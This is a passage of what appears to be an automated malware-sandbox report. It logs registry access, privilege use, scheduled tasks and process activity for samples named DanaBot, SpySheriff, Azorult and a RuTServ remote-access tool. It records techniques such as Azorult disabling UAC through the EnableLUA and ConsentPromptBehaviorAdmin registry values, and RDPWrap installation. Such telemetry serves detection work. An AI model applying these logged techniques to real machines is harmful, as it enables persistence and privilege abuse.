| Key queried | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\SYSTEM32\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\SYSTEM32\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\SYSTEM32\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
Permission Groups Discovery: Local Groups
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\Downloads\DanaBot.exe |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\Downloads\DanaBot.exe |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\Downloads\DanaBot.exe |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\Downloads\DanaBot.exe |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\sc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\sc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\icacls.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Downloads\SpySheriff.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\sc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\sc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\icacls.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\icacls.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\net1.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\net1.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\icacls.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\regedit.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\ProgramData\Microsoft\Intel\taskhost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\icacls.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\schtasks.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\net1.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\rdp\Rar.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\schtasks.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\attrib.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\sc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\sc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\icacls.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\rdp\RDPWInst.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\icacls.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\icacls.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\icacls.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Downloads\SpySheriff.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\programdata\microsoft\intel\R8.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\icacls.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\icacls.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\icacls.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\net1.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\icacls.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\timeout.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\sc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\net.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\icacls.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\icacls.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\timeout.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\ProgramData\Windows\winit.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\ProgramData\Windows\winit.exe | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Gathers network information
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\ipconfig.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133921237954079128" | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Charset | C:\ProgramData\Windows\winit.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Codepage | C:\ProgramData\Windows\winit.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-186956858-2143653872-2609589082-1000_Classes\Local Settings | C:\programdata\microsoft\intel\R8.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-186956858-2143653872-2609589082-1000_Classes\Local Settings | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-186956858-2143653872-2609589082-1000_Classes\Local Settings | C:\ProgramData\Microsoft\Intel\wini.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-186956858-2143653872-2609589082-1000_Classes\Local Settings | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-186956858-2143653872-2609589082-1000_Classes\Local Settings | C:\Windows\system32\OpenWith.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-186956858-2143653872-2609589082-1000\{BA141F2C-3A75-459F-A01F-78DB12628BC1} | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-186956858-2143653872-2609589082-1000_Classes\MIME\Database | C:\ProgramData\Windows\winit.exe | N/A |
NTFS ADS
| Description | Indicator | Process | Target |
| File opened for modification | C:\ProgramData\Microsoft\Intel\winmgmts:\localhost\root\CIMV2 | C:\Programdata\RealtekHD\taskhostw.exe | N/A |
Opens file in notepad (likely ransom note)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\NOTEPAD.EXE | N/A |
Runs .reg file with regedit
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\regedit.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\regedit.exe | N/A |
Runs net.exe
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Programdata\RealtekHD\taskhostw.exe | N/A |
| N/A | N/A | C:\Windows\system32\OpenWith.exe | N/A |
Suspicious behavior: LoadsDriver
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious behavior: SetClipboardViewer
| Description | Indicator | Process | Target |
| N/A | N/A | C:\ProgramData\Windows\rfusclient.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\ProgramData\Windows\rutserv.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\ProgramData\Windows\rutserv.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\ProgramData\Windows\rutserv.exe | N/A |
| Token: SeTcbPrivilege | N/A | C:\ProgramData\Windows\rutserv.exe | N/A |
| Token: SeTcbPrivilege | N/A | C:\ProgramData\Windows\rutserv.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeAuditPrivilege | N/A | C:\Windows\System32\svchost.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\rdp\RDPWInst.exe | N/A |
| Token: SeAuditPrivilege | N/A | C:\Windows\System32\svchost.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Suspicious use of FindShellTrayWindow
Suspicious use of SetWindowsHookEx
Suspicious use of WriteProcessMemory
System policy modification
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System | C:\Users\Admin\Downloads\Azorult.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Users\Admin\Downloads\Azorult.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | C:\Users\Admin\Downloads\Azorult.exe | N/A |
Views/modifies file attributes
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
Processes
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument C:\Users\Admin\AppData\Local\Temp\20250322_162339.webp
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x2c8,0x2cc,0x2d0,0x2c4,0x314,0x7ffb204ef208,0x7ffb204ef214,0x7ffb204ef220
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=1732,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=2196 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2160,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=2156 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=2368,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=2444 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3480,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=3520 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
